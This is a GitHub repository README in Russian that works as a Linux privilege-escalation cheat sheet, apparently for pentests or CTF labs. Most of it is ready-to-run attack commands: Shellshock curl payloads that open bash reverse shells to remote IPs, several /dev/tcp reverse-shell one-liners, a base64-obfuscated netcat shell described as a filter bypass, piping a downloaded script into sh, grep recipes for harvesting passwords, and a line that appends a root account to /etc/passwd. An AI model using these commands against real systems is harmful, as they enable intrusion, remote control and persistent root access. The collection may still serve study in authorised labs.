Skip to content

mxdelta/Up_Priveleges_Linux

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

64 Commits
 
 

Repository files navigation

Скрипты повышения привелегий

    https://github.com/rebootuser/LinEnum

    https://github.com/rebootuser/LinEnum.git

    https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

    wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh | sh

enumeration

дистрибутив;

    cat /etc/issue
    cat /etc/*-release

версия ядра и разрядность;

    cat /proc/version
    uname -a

сетевые интерфейсы, порты, службы;

    netstat
    ss -tulpn

процессы

    ps aux
    ps -ef
    pspy64 (Надо скачивать)

    https://github.com/DominicBreuker/pspy

    wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64s       

Файлы, которые стоит проверить

    /home/user/.bash_history
    /home/user/password.txt
    /home/user/.history
    /home/user/.mysql_history
    /home/user/.ssh/id_rsa

Разрешенные пермишены

    Sudo -l

    getcap -r / 2>/dev/null

curl -H "User-Agent: () { :;}; echo; /bin/sudo -l" http://10.8.0.10/cgi-bin/shell.sh

curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/10.8.0.4/1234 0>&1" http://10.8.0.10/cgi-bin/shell.sh

http://localhost.com/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.14.61/4242 0>&1"`'}

bash -c "bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"

/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.123/4444 0>&1'

echo "system("bash -c 'bash -i >& /dev/tcp/10.10.14.50/4444 0>&1'")" > file.plt

echo bmMgMTkyLjE2OC41MC4xMjMgNDQ0NCAtZSAvYmluL2Jhc2gK | base64 -d | bash (обход фильтрации)

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php (Лучший PHP)

https://www.revshells.com/

Повысить до tty интелектуальной оболочки командой

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

/bin/bash -p - это команда запуска интерпретатора командной строки Bash с флагом -p, который означает "privileged mode" (привилегированный режим).

Найти файлы владельцем которого является группа

    find / -group bugtracker 2>/dev/null

Найти файлы владельцем которого является пользователь

    find / -type f -user emily 2>/dev/null

Найти все файлы с пермишеном S

    find / -user root -perm -4000 -exec ls -ldb {} \;

    find / -user root -perm -u=s -type f 2>/dev/null

    find / -perm -u=s 2>/dev/null

найти файл по имени

    find / -name "mysql*"

ПОИСК ПАРОЛЕЙ

    cat * | grep -i passw*

    grep -r "passw".

    grep -rni 'enter_network' (поиск везде от текущей)

    for i in $(grep -oP "('.*?')" -R . --no-filename);do x=$(echo -n $i | ent| grep Entropy| awk '{print $3}' ); echo "$x $i"; done | sort -n

(поиск всего, заключенного в ' ' особенно для паролей с применением ентропии)

    grep -E '[A-Z]{1,9}[-_][a-z]{1,9}' -R .

pkexec EXPLOIT

Как понять, подвержены ли ваши дистрибутивы уязвимости pkexec:

whereis pkexec

which pkexec

ls -la /usr/bin/pkexec

find / -type f -name pkexec

poc - https://github.com/arthepsy/CVE-2021-4034

Полезные комманды Линукс

    https://putty.org.ru/articles/unix-linux-ref

открыть gui

    open .

Добавление пользователя с правами root в /etc/passwd

    echo "boot:$(openssl passwd -6 -salt boot password123):0:0:boot:/root:/bin/bash" >> /etc/passwd

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published